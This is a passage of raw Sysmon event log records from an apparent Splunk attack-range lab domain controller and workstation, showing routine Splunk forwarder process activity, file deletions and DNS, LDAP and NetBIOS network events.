Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107552Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.244{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B4FB-615A-5F02-00000000FC01}1624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107551Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.243{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107550Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.243{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107549Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.242{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107548Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.242{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107547Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.242{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B4FB-615A-5F02-00000000FC01}1624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107546Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.242{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B4FB-615A-5F02-00000000FC01}1624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107545Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.242{58E9C193-B4FB-615A-5F02-00000000FC01}1624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000107544Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.067{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-57724-true2001:7fe:0:0:0:0:0:53i.root-servers.net53domain 23542300x8000000000000000107543Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.095{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26B07F14D7619715B967B8820088C2F0,SHA256=B9A6B60655519C63E01A1ED8FB153BB5DFD424DEB1426BF36E5D8B3E42A6ACEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083481Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:04.759{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDD1C566B30D8A44FA3D678755092FDD,SHA256=A506D1F5E6460002783F9F5B94513CA212584D0F93E0A93D8CAAD0E509952B4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107571Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:04.552{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56F92D5374E3AE3A32AC0ED8778962A6,SHA256=530A0651C026958F799C406E6197B0C41969F0AD98C87485EA48B0E391797EFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107570Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:04.247{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=75599BCD733F5834EBE47F6CFB2120E0,SHA256=576F76C82D11C7AB97A56DF063EF5C433E51AC1F5E0D4D1B699D1DC7214C7D91,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107569Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.693{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51916-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000107568Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:02.693{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51916-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 10341000x8000000000000000107567Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:04.168{58E9C193-B4FB-615A-6002-00000000FC01}73087404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000083482Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:05.884{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A169E5BB7086AED0074FD7B542F25013,SHA256=16F85E3E49A3BA945576B8A51ED6F23E0D00012840BA1469CF63401C4F6826A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107582Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:05.611{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05757CD1DA87745181CBEE1C3C31790B,SHA256=8277642A0E1637C2F9CF96A68B5AF835F755F982E68A25F45C6CCA4B5A337A11,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107581Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:05.530{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B4FD-615A-6102-00000000FC01}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107580Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:05.527{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107579Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:05.527{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107578Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:05.526{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107577Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:05.526{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107576Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:05.526{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B4FD-615A-6102-00000000FC01}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107575Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:05.526{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B4FD-615A-6102-00000000FC01}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107574Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:05.526{58E9C193-B4FD-615A-6102-00000000FC01}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000107573Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.345{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52683- 354300x8000000000000000107572Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.320{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local52683- 23542300x800000000000000083484Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:06.915{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABF831A02B9EBCF64E90FED6EB96A5CF,SHA256=AF6ED119D60CDA31B3603C5A13CA07395DFDE9BFB168D30D0F05CF10A580141E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107586Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:06.617{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7372B451AFFDE8F38B9792394199EC87,SHA256=1320E77FE237C2563FAA8FFB8E0EE1633F26D8E0FCB9B1E7D4BFB930ED440031,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083483Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:04.752{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50172-false10.0.1.12-8000- 23542300x8000000000000000107585Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:06.535{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A93C3C307D0B28F6222E93760FF75340,SHA256=9BED4DA50B24214D4B9D1AF039B512A9DF2C6C242281FDAD18ECE0E135DB9CC1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107584Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.763{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-639.attackrange.local138netbios-dgm 354300x8000000000000000107583Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:03.763{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-639.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 23542300x8000000000000000107588Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:07.623{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23640C72E16DC6E8E936680B7EB4B3ED,SHA256=17F18CFD1292CA158A5EC795A67CE21FEAA7A1F79AE10C5BB7F55172F974DAF0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107587Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:05.343{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51917-false10.0.1.12-8000- 23542300x8000000000000000107590Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:08.627{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E91971C686033983E43A94D04EFABFDA,SHA256=F8F58872435381BD7BBA00BA81230D6CA394D3BA72736705B49C0C2E39548989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083485Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:02:08.056{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD5BCA31857855B7E556AA7672EF72BC,SHA256=2B58B49E9C1786CFA373EDDB834256F08DF898E9B1016B26B79351EF5F75A814,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107589Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:08.401{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=BB6343C8E65DC8DE3FF5BFC498B89F25,SHA256=52D013AF6DFF2BF405EDDB5962DFFBB4A5254F0201646DA5388775F79D4F67CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107591Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:09.635{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program 